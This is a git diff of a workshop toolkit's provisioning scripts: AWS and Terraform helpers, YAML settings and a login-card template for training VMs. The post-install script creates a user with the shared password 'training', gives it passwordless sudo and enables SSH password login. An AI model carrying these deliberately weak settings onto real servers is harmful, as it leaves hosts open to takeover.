aws ec2 describe-instance-status \
--instance-ids $IDS \
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
--output table
}
aws_display_instances_by_tag() {
result=$(aws ec2 describe-instances --output table \
--filter "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].[ \
InstanceId, \
State.Name, \
Tags[0].Value, \
PublicIpAddress, \
InstanceType \
]"
)
if [[ -z $result ]]; then
die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
else
echo "$result"
fi
}
aws_get_instance_ids_by_filter() {
FILTER=$1
aws ec2 describe-instances --filters $FILTER \
--query Reservations[*].Instances[*].InstanceId \
--output text | tr "\t" "\n" | tr -d "\r"
}
aws_get_instance_ids_by_client_token() {
TOKEN=$1
aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
}
aws_get_instance_ids_by_tag() {
aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
}
aws_get_instance_ips_by_tag() {
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
--output text \
--query "Reservations[*].Instances[*].PublicIpAddress" \
| tr "\t" "\n" \
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}
aws_kill_instances_by_tag() {
IDS=$(aws_get_instance_ids_by_tag $TAG)
if [ -z "$IDS" ]; then
die "Invalid tag."
fi
info "Deleting instances with tag $TAG."
aws ec2 terminate-instances --instance-ids $IDS \
| grep ^TERMINATINGINSTANCES
info "Deleted instances with tag $TAG."
}
aws_tag_instances() {
OLD_TAG_OR_TOKEN=$1
NEW_TAG=$2
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}
aws_get_ami() {
##VERSION##
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 18.04 -t hvm:ebs -N -q
}

View File

@@ -1,8 +0,0 @@
infra_start() {
COUNT=$1
info "You should now run your provisioning commands for $COUNT machines."
info "Note: no machines have been automatically created!"
info "Once done, put the list of IP addresses in tags/$TAG/ips.txt"
info "(one IP address per line, without any comments or extra lines)."
touch tags/$TAG/ips.txt
}

View File

@@ -1,20 +0,0 @@
infra_start() {
COUNT=$1
cp terraform/*.tf tags/$TAG
(
cd tags/$TAG
terraform init
echo prefix = \"$TAG\" >> terraform.tfvars
echo count = \"$COUNT\" >> terraform.tfvars
terraform apply -auto-approve
terraform output ip_addresses > ips.txt
)
}
infra_stop() {
(
cd tags/$TAG
terraform destroy -auto-approve
)
}

View File

@@ -1,15 +1,20 @@
#!/usr/bin/env python3
#!/usr/bin/env python
import os
import sys
import yaml
import jinja2
def prettify(l):
l = [ip.strip() for ip in l]
ret = [ "node{}: <code>{}</code>".format(i+1, s) for (i, s) in zip(range(len(l)), l) ]
return ret
# Read settings from user-provided settings file
context = yaml.safe_load(open(sys.argv[1]))
SETTINGS = yaml.load(open(sys.argv[1]))
clustersize = SETTINGS["clustersize"]
ips = list(open("ips.txt"))
clustersize = context["clustersize"]
print("---------------------------------------------")
print(" Number of IPs: {}".format(len(ips)))
@@ -25,32 +30,21 @@ while ips:
ips = ips[clustersize:]
clusters.append(cluster)
context["clusters"] = clusters
template_file_name = context["cards_template"]
template_file_path = os.path.join(
os.path.dirname(__file__),
"..",
"templates",
template_file_name
)
template = jinja2.Template(open(template_file_path).read())
template_file_name = SETTINGS["cards_template"]
template = jinja2.Template(open(template_file_name).read())
with open("ips.html", "w") as f:
f.write(template.render(**context))
f.write(template.render(clusters=clusters, **SETTINGS))
print("Generated ips.html")
try:
import pdfkit
paper_size = context["paper_size"]
margin = {"A4": "0.5cm", "Letter": "0.2in"}[paper_size]
with open("ips.html") as f:
pdfkit.from_file(f, "ips.pdf", options={
"page-size": paper_size,
"margin-top": margin,
"margin-bottom": margin,
"margin-left": margin,
"margin-right": margin,
"page-size": SETTINGS["paper_size"],
"margin-top": SETTINGS["paper_margin"],
"margin-bottom": SETTINGS["paper_margin"],
"margin-left": SETTINGS["paper_margin"],
"margin-right": SETTINGS["paper_margin"],
})
print("Generated ips.pdf")
except ImportError:

View File

@@ -12,9 +12,7 @@ config = yaml.load(open("/tmp/settings.yaml"))
COMPOSE_VERSION = config["compose_version"]
MACHINE_VERSION = config["machine_version"]
CLUSTER_SIZE = config["clustersize"]
CLUSTER_PREFIX = config["clusterprefix"]
ENGINE_VERSION = config["engine_version"]
DOCKER_USER_PASSWORD = config["docker_user_password"]
#################################
@@ -47,7 +45,7 @@ def system(cmd):
# On EC2, the ephemeral disk might be mounted on /mnt.
# If /mnt is a mountpoint, place Docker workspace on it.
system("if mountpoint -q /mnt; then sudo mkdir -p /mnt/docker && sudo ln -sfn /mnt/docker /var/lib/docker; fi")
system("if mountpoint -q /mnt; then sudo mkdir /mnt/docker && sudo ln -s /mnt/docker /var/lib/docker; fi")
# Put our public IP in /tmp/ipv4
# ipv4_retrieval_endpoint = "http://169.254.169.254/latest/meta-data/public-ipv4"
@@ -56,24 +54,15 @@ system("curl --silent {} > /tmp/ipv4".format(ipv4_retrieval_endpoint))
ipv4 = open("/tmp/ipv4").read()
# Add a "docker" user with password coming from the settings
# Add a "docker" user with password "training"
system("id docker || sudo useradd -d /home/docker -m -s /bin/bash docker")
system("echo docker:{} | sudo chpasswd".format(DOCKER_USER_PASSWORD))
system("echo docker:training | sudo chpasswd")
# Fancy prompt courtesy of @soulshake.
system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
export PS1='\e[1m\e[31m[{}] \e[32m(\\$(docker-prompt)) \e[34m\u@\h\e[35m \w\e[0m\n$ '
SQRL""".format(ipv4))
# Bigger history, in a different file, and saved before executing each command
system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
export HISTSIZE=9999
export HISTFILESIZE=9999
shopt -s histappend
trap 'history -a' DEBUG
export HISTFILE=~/.history
SQRL""")
# Custom .vimrc
system("""sudo -u docker tee /home/docker/.vimrc <<SQRL
syntax on
@@ -82,29 +71,8 @@ set expandtab
set number
set shiftwidth=2
set softtabstop=2
set nowrap
SQRL""")
# Custom .tmux.conf
system(
"""sudo -u docker tee /home/docker/.tmux.conf <<SQRL
bind h select-pane -L
bind j select-pane -D
bind k select-pane -U
bind l select-pane -R
# Allow using mouse to switch panes
set -g mouse on
# Make scrolling with wheels work
bind -n WheelUpPane if-shell -F -t = "#{mouse_any_flag}" "send-keys -M" "if -Ft= '#{pane_in_mode}' 'send-keys -M' 'select-pane -t=; copy-mode -e; send-keys -M'"
bind -n WheelDownPane select-pane -t= \; send-keys -M
SQRL"""
)
# add docker user to sudoers and allow password authentication
system("""sudo tee /etc/sudoers.d/docker <<SQRL
docker ALL=(ALL) NOPASSWD:ALL
@@ -114,8 +82,7 @@ system("sudo sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /e
system("sudo service ssh restart")
system("sudo apt-get -q update")
system("sudo apt-get -qy install git jq")
system("sudo apt-get -qy install emacs-nox joe")
system("sudo apt-get -qy install git jq python-pip")
#######################
### DOCKER INSTALLS ###
@@ -130,6 +97,7 @@ system("sudo apt-get -q update")
system("sudo apt-get -qy install docker-ce")
### Install docker-compose
#system("sudo pip install -U docker-compose=={}".format(COMPOSE_VERSION))
system("sudo curl -sSL -o /usr/local/bin/docker-compose https://github.com/docker/compose/releases/download/{}/docker-compose-{}-{}".format(COMPOSE_VERSION, platform.system(), platform.machine()))
system("sudo chmod +x /usr/local/bin/docker-compose")
system("docker-compose version")
@@ -140,7 +108,7 @@ system("sudo chmod +x /usr/local/bin/docker-machine")
system("docker-machine version")
system("sudo apt-get remove -y --purge dnsmasq-base")
system("sudo apt-get -qy install python-setuptools pssh apache2-utils httping htop unzip mosh tree")
system("sudo apt-get -qy install python-setuptools pssh apache2-utils httping htop unzip mosh")
### Wait for Docker to be up.
### (If we don't do this, Docker will not be responsive during the next step.)
@@ -153,7 +121,7 @@ addresses = list(l.strip() for l in sys.stdin)
assert ipv4 in addresses
def makenames(addrs):
return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]
return [ "node%s"%(i+1) for i in range(len(addrs)) ]
while addresses:
cluster = addresses[:CLUSTER_SIZE]
@@ -167,21 +135,15 @@ while addresses:
print(cluster)
mynode = cluster.index(ipv4) + 1
system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
system("echo node{} | sudo tee /etc/hostname".format(mynode))
system("sudo hostname node{}".format(mynode))
system("sudo -u docker mkdir -p /home/docker/.ssh")
system("sudo -u docker touch /home/docker/.ssh/authorized_keys")
# Create a convenience file to easily check if we're the first node
if ipv4 == cluster[0]:
system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
# On the first node, if we don't have a private key, generate one (with empty passphrase)
# If I'm node1 and don't have a private key, generate one (with empty passphrase)
system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
else:
system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
# Record the IPV4 and name of the first node
system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))
FINISH = time.time()
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])

View File

@@ -1,17 +1,12 @@
# This file can be sourced in order to directly run commands on
# a group of VMs whose IPs are located in ips.txt of the directory in which
# a batch of VMs whose IPs are located in ips.txt of the directory in which
# the command is run.
pssh() {
if [ -z "$TAG" ]; then
>/dev/stderr echo "Variable \$TAG is not set."
return
fi
HOSTFILE="tags/$TAG/ips.txt"
HOSTFILE="ips.txt"
[ -f $HOSTFILE ] || {
>/dev/stderr echo "Hostfile $HOSTFILE not found."
>/dev/stderr echo "No hostfile found at $HOSTFILE"
return
}

View File

@@ -1,42 +0,0 @@
<!DOCTYPE html>
<html>
<head>
<title>bash history</title>
<style>
#log {
font: bold 24px courier;
}
#log div:last-child {
background: yellow;
}
</style>
</head>
<body>
<div id="log"></div>
<script>
var ws = new WebSocket('ws://' + (location.host ? location.host : "localhost:8080") + "/");
var log = document.getElementById('log');
var echo = function(text) {
var line = document.createElement('div');
line.textContent = text;
log.appendChild(line);
line.scrollIntoView();
}
ws.onopen = function() {
document.body.style.backgroundColor = '#cfc';
};
ws.onclose = function() {
document.body.style.backgroundColor = '#fcc';
echo("Disconnected from server. Try to reload this page?");
};
ws.onmessage = function(event) {
echo(event.data);
};
</script>
</body>
</html>

View File

@@ -1,49 +0,0 @@
#!/usr/bin/env python
import os
import requests
import yaml
# configurable stuff
domains_file = "../../plentydomains/domains.txt"
config_file = os.path.join(
os.environ["HOME"], ".config/gandi/config.yaml")
tag = "test"
apiurl = "https://dns.api.gandi.net/api/v5/domains"
# inferred stuff
domains = open(domains_file).read().split()
apikey = yaml.safe_load(open(config_file))["apirest"]["key"]
ips = open(f"tags/{tag}/ips.txt").read().split()
settings_file = f"tags/{tag}/settings.yaml"
clustersize = yaml.safe_load(open(settings_file))["clustersize"]
# now do the fucking work
while domains and ips:
domain = domains[0]
domains = domains[1:]
cluster = ips[:clustersize]
ips = ips[clustersize:]
print(f"{domain} => {cluster}")
zone = ""
node = 0
for ip in cluster:
node += 1
zone += f"@ 300 IN A {ip}\n"
zone += f"* 300 IN A {ip}\n"
zone += f"node{node} 300 IN A {ip}\n"
r = requests.put(
f"{apiurl}/{domain}/records",
headers={"x-api-key": apikey},
data=zone)
print(r.text)
#r = requests.get(
# f"{apiurl}/{domain}/records",
# headers={"x-api-key": apikey},
# )
if domains:
print(f"Good, we have {len(domains)} domains left.")
if ips:
print(f"Crap, we have {len(ips)} IP addresses left.")

View File

@@ -1,23 +0,0 @@
# Number of VMs per cluster
clustersize: 1
# The hostname of each node will be clusterprefix + a number
clusterprefix: dmuc
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training
image:

View File

@@ -1,24 +0,0 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: kubenet
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training
clusternumber: 100
image:

View File

@@ -1,24 +0,0 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: kuberouter
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training
clusternumber: 200
image:

View File

@@ -1,23 +0,0 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: test
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training
image:

View File

@@ -1,8 +1,5 @@
# Number of VMs per cluster
clustersize: 5
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: clusters.csv

View File

@@ -1,23 +0,0 @@
# customize your cluster size, your cards template, and the versions
# Number of VMs per cluster
clustersize: 5
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# This can be "test" or "stable"
engine_version: test
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.13.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -3,21 +3,22 @@
# Number of VMs per cluster
clustersize: 1
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
engine_version: test
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.25.4
machine_version: 0.15.0
# Password used to connect with the "docker user"
docker_user_password: training
compose_version: 1.17.1
machine_version: 0.13.0

View File

@@ -1,22 +0,0 @@
# Number of VMs per cluster
clustersize: 4
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.25.4
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,24 +0,0 @@
# 3 nodes for k8s 101 workshops
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -0,0 +1,24 @@
# This file is passed by trainer-cli to scripts/ips-txt-to-html.py
# Number of VMs per cluster
clustersize: 5
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: test
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.17.1
machine_version: 0.13.0

View File

@@ -1,23 +0,0 @@
# This file is passed by trainer-cli to scripts/ips-txt-to-html.py
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.15.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,80 +0,0 @@
#!/bin/sh
set -e
retry () {
N=$1
I=0
shift
while ! "$@"; do
I=$(($I+1))
if [ $I -gt $N ]; then
echo "FAILED, ABORTING"
exit 1
fi
echo "FAILED, RETRYING ($I/$N)"
done
}
export AWS_INSTANCE_TYPE=t3a.small
INFRA=infra/aws-eu-west-3
STUDENTS=2
PREFIX=$(date +%Y-%m-%d-%H-%M)
SETTINGS=admin-dmuc
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $STUDENTS
retry 5 ./workshopctl deploy $TAG
retry 5 ./workshopctl disabledocker $TAG
retry 5 ./workshopctl kubebins $TAG
./workshopctl cards $TAG
SETTINGS=admin-kubenet
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))
retry 5 ./workshopctl disableaddrchecks $TAG
retry 5 ./workshopctl deploy $TAG
retry 5 ./workshopctl kubebins $TAG
./workshopctl cards $TAG
SETTINGS=admin-kuberouter
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))
retry 5 ./workshopctl disableaddrchecks $TAG
retry 5 ./workshopctl deploy $TAG
retry 5 ./workshopctl kubebins $TAG
./workshopctl cards $TAG
#INFRA=infra/aws-us-west-1
export AWS_INSTANCE_TYPE=t3a.medium
SETTINGS=admin-test
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))
retry 5 ./workshopctl deploy $TAG
retry 5 ./workshopctl kube $TAG 1.15.9
./workshopctl cards $TAG

View File

@@ -1,290 +0,0 @@
{#
The variables below can be customized here directly, or in your
settings.yaml file. Any variable in settings.yaml will be exposed
in here as well.
#}
{%- set url = url
| default("http://FIXME.container.training/") -%}
{%- set pagesize = pagesize
| default(9) -%}
{%- set lang = lang
| default("en") -%}
{%- set event = event
| default("training session") -%}
{%- set backside = backside
| default(False) -%}
{%- set image = image
| default("kube") -%}
{%- set clusternumber = clusternumber
| default(None) -%}
{%- if qrcode == True -%}
{%- set qrcode = "https://container.training/q" -%}
{%- elif qrcode -%}
{%- set qrcode = qrcode -%}
{%- endif -%}
{# You can also set img_bottom_src instead. #}
{%- set img_logo_src = {
"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
"kube": "https://avatars1.githubusercontent.com/u/13629408",
"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
}[image] -%}
{%- if lang == "en" and clustersize == 1 -%}
{%- set intro -%}
Here is the connection information to your very own
machine for this {{ event }}.
You can connect to this VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machine is:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clustersize != 1 -%}
{%- set intro -%}
Here is the connection information to your very own
cluster for this {{ event }}.
You can connect to each VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machines are:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize == 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
machine pour cette formation.
Vous pouvez vous connecter à cette machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresse IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clusterprefix != "node" -%}
{%- set intro -%}
Here is the connection information for the
<strong>{{ clusterprefix }}</strong> environment.
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize != 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
cluster pour cette formation.
Vous pouvez vous connecter à chaque machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresses IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" -%}
{%- set slides_are_at -%}
You can find the slides at:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set slides_are_at -%}
Le support de formation est à l'adresse suivante :
{%- endset -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
{% if paper_size == "A4" %}
@page {
size: A4; /* Change from the default size of A4 */
margin: 0.5cm; /* Set margin on each page */
}
body {
/* this is A4 minus 0.5cm margins */
width: 20cm;
height: 28.7cm;
}
{% elif paper_size == "Letter" %}
@page {
size: Letter;
margin: 0.2in;
}
body {
/* this is Letter minus 0.2in margins */
width: 8.6in;
heigth: 10.6in;
}
{% endif %}
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 15px;
font-family: 'Slabo 27px';
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
{% if backside %}
height: 33%;
{% endif %}
/* columns * (width+left+right) < 100% */
/*
width: 24.8%;
*/
/**/
width: 33%;
/**/
}
p {
margin: 0.8em;
}
div.back {
border: 1px dotted grey;
}
span.scale {
white-space: nowrap;
}
img.logo {
height: 4.5em;
float: right;
}
img.bottom {
height: 2.5em;
display: block;
margin: 0.5em auto;
}
.qrcode img {
width: 40%;
margin: 1em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 0;
}
</style>
<script type="text/javascript" src="https://cdn.rawgit.com/davidshimjs/qrcodejs/gh-pages/qrcode.min.js"></script>
<script type="text/javascript">
function qrcodes() {
[].forEach.call(
document.getElementsByClassName("qrcode"),
(e, index) => {
new QRCode(e, {
text: "{{ qrcode }}",
correctLevel: QRCode.CorrectLevel.L
});
}
);
}
function scale() {
[].forEach.call(
document.getElementsByClassName("scale"),
(e, index) => {
var text_width = e.getBoundingClientRect().width;
var box_width = e.parentElement.getBoundingClientRect().width;
var percent = 100 * box_width / text_width + "%";
e.style.fontSize = percent;
}
);
}
</script>
</head>
<body onload="qrcodes(); scale();">
{% for cluster in clusters %}
<div>
<p>{{ intro }}</p>
<p>
{% if img_logo_src %}
<img class="logo" src="{{ img_logo_src }}" />
{% endif %}
<table>
{% if clusternumber != None %}
<tr><td>cluster:</td></tr>
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
{% endif %}
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
{{ listhead }}
<table>
{% for node in cluster %}
<tr>
<td>{{ clusterprefix }}{{ loop.index }}:</td>
<td>{{ node }}</td>
</tr>
{% endfor %}
</table>
</p>
<p>
{% if url %}
{{ slides_are_at }}
<p>
<span class="scale">{{ url }}</span>
</p>
{% endif %}
{% if img_bottom_src %}
<img class="bottom" src="{{ img_bottom_src }}" />
{% endif %}
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% if backside %}
{% for x in range(pagesize) %}
<div class="back">
<p>Thanks for attending
"Getting Started With Kubernetes and Container Orchestration"
during CONFERENCE in Month YYYY!</p>
<p>If you liked that workshop,
I can train your team, in person or
online, with custom courses of
any length and any level.
</p>
{% if qrcode %}
<p>If you're interested, please scan that QR code to contact me:</p>
<span class="qrcode"></span>
{% else %}
<p>If you're interested, you can contact me at:</p>
{% endif %}
<p>jerome.petazzoni@gmail.com</p>
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endif %}
{% endfor %}
</body>
</html>

View File

@@ -1,5 +0,0 @@
resource "openstack_compute_keypair_v2" "ssh_deploy_key" {
name = "${var.prefix}"
public_key = "${file("~/.ssh/id_rsa.pub")}"
}

View File

@@ -1,32 +0,0 @@
resource "openstack_compute_instance_v2" "machine" {
count = "${var.count}"
name = "${format("%s-%04d", "${var.prefix}", count.index+1)}"
image_name = "Ubuntu 16.04.5 (Xenial Xerus)"
flavor_name = "${var.flavor}"
security_groups = ["${openstack_networking_secgroup_v2.full_access.name}"]
key_pair = "${openstack_compute_keypair_v2.ssh_deploy_key.name}"
network {
name = "${openstack_networking_network_v2.internal.name}"
fixed_ip_v4 = "${cidrhost("${openstack_networking_subnet_v2.internal.cidr}", count.index+10)}"
}
}
resource "openstack_compute_floatingip_v2" "machine" {
count = "${var.count}"
# This is something provided to us by Enix when our tenant was provisioned.
pool = "Public Floating"
}
resource "openstack_compute_floatingip_associate_v2" "machine" {
count = "${var.count}"
floating_ip = "${openstack_compute_floatingip_v2.machine.*.address[count.index]}"
instance_id = "${openstack_compute_instance_v2.machine.*.id[count.index]}"
fixed_ip = "${cidrhost("${openstack_networking_subnet_v2.internal.cidr}", count.index+10)}"
}
output "ip_addresses" {
value = "${join("\n", openstack_compute_floatingip_v2.machine.*.address)}"
}
variable "flavor" {}

View File

@@ -1,23 +0,0 @@
resource "openstack_networking_network_v2" "internal" {
name = "${var.prefix}"
}
resource "openstack_networking_subnet_v2" "internal" {
name = "${var.prefix}"
network_id = "${openstack_networking_network_v2.internal.id}"
cidr = "10.10.0.0/16"
ip_version = 4
dns_nameservers = ["1.1.1.1"]
}
resource "openstack_networking_router_v2" "router" {
name = "${var.prefix}"
external_network_id = "15f0c299-1f50-42a6-9aff-63ea5b75f3fc"
}
resource "openstack_networking_router_interface_v2" "router_internal" {
router_id = "${openstack_networking_router_v2.router.id}"
subnet_id = "${openstack_networking_subnet_v2.internal.id}"
}

View File

@@ -1,13 +0,0 @@
provider "openstack" {
user_name = "${var.user}"
tenant_name = "${var.tenant}"
domain_name = "${var.domain}"
password = "${var.password}"
auth_url = "${var.auth_url}"
}
variable "user" {}
variable "tenant" {}
variable "domain" {}
variable "password" {}
variable "auth_url" {}

Some files were not shown because too many files have changed in this diff Show More